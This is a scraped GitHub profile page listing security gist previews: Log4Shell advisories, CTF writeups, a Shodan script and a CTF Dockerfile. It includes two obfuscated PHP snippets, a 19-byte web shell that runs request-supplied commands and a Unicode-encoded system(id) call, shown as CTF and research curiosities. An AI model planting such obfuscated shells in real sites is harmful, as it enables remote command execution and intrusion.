Skip to content

Instantly share code, notes, and snippets.

View nauliajati's full-sized avatar
🎯
uwuuu><

N Auliajati nauliajati

🎯
uwuuu><
41 followers · 72 following
  • Indonesia
View GitHub Profile
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active October 14, 2025 08:35
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@terjanq
terjanq / README.md
Last active June 14, 2024 14:36
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
@muff-in
muff-in / resources.md
Last active September 30, 2025 15:52
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@CMNatic
CMNatic / cloudSettings
Last active October 5, 2023 19:22
TryHackMe OWASP-10-A8: Insecure Deserialization RCE PoC
{"lastUpload":"2021-08-31T08:20:42.057Z","extensionVersion":"v3.4.3"}
@LuD1161
LuD1161 / shodan_api_query.py
Created July 4, 2020 12:54
Query Shodan API : Plain and Simple
# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
@Voorivex
Voorivex / HezarSploit.py
Created July 2, 2020 14:45
#!/usr/bin/python
# -*- coding: utf-8 -*-
import ssl
import socket
import os
import sys
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from threading import Thread
@terjanq
terjanq / rev_shell.php
Last active December 27, 2024 14:54
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@terjanq
terjanq / funny.php
Last active August 19, 2024 04:03
PHPF*ck
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>
<!--
Explanation:
- Some of the characters might look like alphanumeric, but they are Unicode characters.
- 'ArrayΦ' <-> [].Φ
- 1 <-> ![]
- 'a' <-> ([].Φ)[![]+![]+![]]
@syndrill
syndrill / Dockerfile
Created September 17, 2018 11:52
HackToday 2018 - faile
FROM phusion/baseimage
EXPOSE 5000
ARG binary
ENV binary=${binary}
# update
RUN apt update && apt upgrade -y && apt update --fix-missing
RUN apt install curl python netcat-openbsd vim nano socat lib32ncurses5 -y
@LiveOverflow
LiveOverflow / googlectf2018_js_safe_2.py
Last active March 15, 2023 02:54
GoogleCTF2018 - JS Safe 2
import random
import re
# python3
# STAGE 1
"""
stage1 = 'Ӈ#7ùª9¨M¤ŸÀ.áÔ¥6¦¨¹.ÿÓÂ.։£JºÓ¹WþʖmãÖÚG¤…¢dÈ9&òªћ#³­1᧨'
out = ""
key = "\x82\x1e\x0a\x9a"